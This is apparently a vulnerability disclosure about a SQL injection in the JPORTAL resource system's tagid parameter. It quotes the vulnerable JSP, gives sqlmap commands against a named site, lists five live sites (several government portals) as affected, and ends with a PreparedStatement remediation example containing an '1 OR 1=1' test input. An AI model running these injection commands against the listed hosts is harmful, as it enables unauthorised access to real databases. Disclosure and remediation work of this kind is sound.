### Brief description:

JPORTAL resource integration SQL injection vulnerability (3)

### Detailed description:

I suddenly noticed that Dahan Network's (大汉网络) JPORTAL resource integration system falls under general applications, so... here I am.

File path: `/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1`

Partial code:

```
// tagid is read straight from the request, with no validation
String tagid = Convert.getParameter(request,"tagid");
String tagname = Convert.getParameter(request,"tagname");
int isiteid= userEntity.getI_siteid();
int linages = 5;
int nowpage = Convert.getParameterInt(request, "page", 1);
String userid = Convert.getParameter(request,"userid");
String msg = "";
// Global parameters
Pertool_UserThemesBLF userthemesblf = new Pertool_UserThemesBLF();
String themesid = userthemesblf.getUserThemes(""+userEntity.getI_id(),channelid,userEntity.getI_siteid());
StringBuffer strbuf_even = new StringBuffer();
// Get the channels
Pertool_ResourceService resblf = new Pertool_ResourceService();
Pertool_ChannelBLF channelBLF = new Pertool_ChannelBLF(request);
Pertool_ChannelEntity channelEntity = new Pertool_ChannelEntity();
channelEntity.setI_siteid(isiteid);
channelEntity.setVc_userid(""+userEntity.getI_id());
ArrayList<Pertool_ChannelEntity> al_channel = channelBLF.getChannelEntity(channelEntity);
// Get the resources related to the tag
Pertool_ResourceDetail resdetail = new Pertool_ResourceDetail();
ArrayList<Pertool_ResourceEntity> all_resentity = resdetail.getResByTagId(tagid,linages,nowpage,isiteid,userid,channelid);
ArrayList<Pertool_ResourceEntity> all_resEntityNum = resdetail.getResByTagId(tagid,0,0,isiteid,userid,channelid);
Pertool_ResourceEntity resentity = null;
String alltagName = "";
// The request-supplied tagid reaches getAllTags unchanged
ArrayList<Pertool_TagEntity> allTagEntity = resdetail.getAllTags(tagid);
```

`tagid` is passed into `getAllTags`, which causes the injection.

```
sqlmap.py - "www.simt.com.cn/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1" --dbms oracle
```

![1.jpg](https://images.seebug.org/upload/201503/0323024404457aa17b6bbd5ba1f1c197bc2341c9.jpg)

```
sqlmap.py - "www.simt.com.cn/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1" --dbms oracle --current-db
```

![2.jpg](https://images.seebug.org/upload/201503/032303036991af581f5f62984c9cb98b0af04dac.jpg)

5 cases:

- http://www.simt.com.cn/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1
- http://inb.ningbo.gov.cn/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1
- http://portal.jinan.gov.cn/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1
- http://www.zj.gov.cn/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1
- http://pertool.sdds.gov.cn/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1

### Proof of vulnerability:
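
For the `tagid` flow into `getAllTags` described in the detailed description, the following added example (not code from the original report or from the vendor) shows the remediation pattern: validate the value as a number, then bind it with a `PreparedStatement`. The class `TagLookup`, the helper names, the table `pertool_tag` and the columns `vc_tagname` and `i_id` are hypothetical; it is also assumed that `tagid` is numeric and that the affected method builds its SQL by string concatenation, since its body is not shown on the page.

```java
import java.sql.*;
import java.util.*;

public class TagLookup {
    // Hypothetical table and column names; the real schema is not shown on the page.
    private static final String SQL =
        "SELECT vc_tagname FROM pertool_tag WHERE i_id = ?";

    /** Accept only a short run of ASCII digits; anything else is rejected. */
    static long parseTagId(String raw) {
        if (raw == null || !raw.matches("[0-9]{1,18}")) {
            throw new IllegalArgumentException("tagid must be numeric");
        }
        return Long.parseLong(raw);
    }

    /** Pattern to avoid (assumed): the request value becomes part of the SQL text. */
    static String concatenatedQuery(String rawTagId) {
        return "SELECT vc_tagname FROM pertool_tag WHERE i_id = " + rawTagId;
    }

    /** Hardened lookup: the value is validated, then bound as a parameter. */
    static List<String> getAllTags(Connection conn, String rawTagId) throws SQLException {
        long tagId = parseTagId(rawTagId);
        List<String> names = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(SQL)) {
            ps.setLong(1, tagId);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    names.add(rs.getString(1));
                }
            }
        }
        return names;
    }

    public static void main(String[] args) {
        // Constructed inputs: one well-formed id, one that carries SQL syntax.
        for (String raw : new String[] {"1", "1 OR 1=1"}) {
            System.out.println("concatenated: " + concatenatedQuery(raw));
            try {
                System.out.println("validated id: " + parseTagId(raw));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

`main` runs without a database and only contrasts the two query-building paths; `getAllTags` needs a JDBC `Connection` supplied by the application.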